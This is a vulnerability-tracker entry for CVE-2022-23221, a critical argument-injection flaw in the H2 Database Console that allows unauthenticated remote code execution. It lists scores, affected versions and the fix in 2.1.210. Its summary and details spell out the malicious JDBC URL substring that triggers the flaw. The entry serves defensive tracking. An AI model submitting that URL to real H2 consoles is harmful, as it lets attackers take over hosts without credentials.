Cyber Resilience

CVE-2022-23221

CriticalPublic PoC

Published: 19 January 2022

Published
19 January 2022
Modified
05 May 2025
KEV Added
Patch
CVSS Score v3.1 9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.2657 96.5th percentile
Risk Priority 36 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2022-23221 is a critical-severity Argument Injection (CWE-88) vulnerability in Debian Debian Linux. Its CVSS base score is 9.8 (Critical).

Operationally, ranked in the top 3.5% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

Deeper analysis

The vulnerability affects the H2 Console in versions prior to 2.1.210 and stems from insufficient validation of JDBC connection URLs. Attackers can supply a jdbc:h2:mem URL containing the parameters IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT to trigger arbitrary code execution during console initialization. This issue is tracked as CWE-88 and carries a CVSS 3.1 score of 9.8.

Unauthenticated remote attackers with network access to the H2 Console can exploit the flaw by submitting the malicious JDBC URL, resulting in full compromise of the confidentiality, integrity, and availability of the host system. No user interaction or credentials are required.

The H2 project addressed the issue in release 2.1.210, with corresponding updates published through its GitHub security advisories and release notes. Debian subsequently issued patched packages for affected LTS distributions.

The associated EPSS score has remained flat at its peak value of 0.2657 since disclosure, indicating no material increase in observed exploitation interest.

EU & UK References

Vulnerability details

H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.

CWE(s)

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

h2database
h2
1.1.100 — 2.0.206
debian
debian linux
10.0, 11.0, 9.0
oracle
communications cloud native core console
1.9.0

Mitigating Controls

No mitigating controls mapped yet. The per-CVE control annotator has not reached this CVE.

References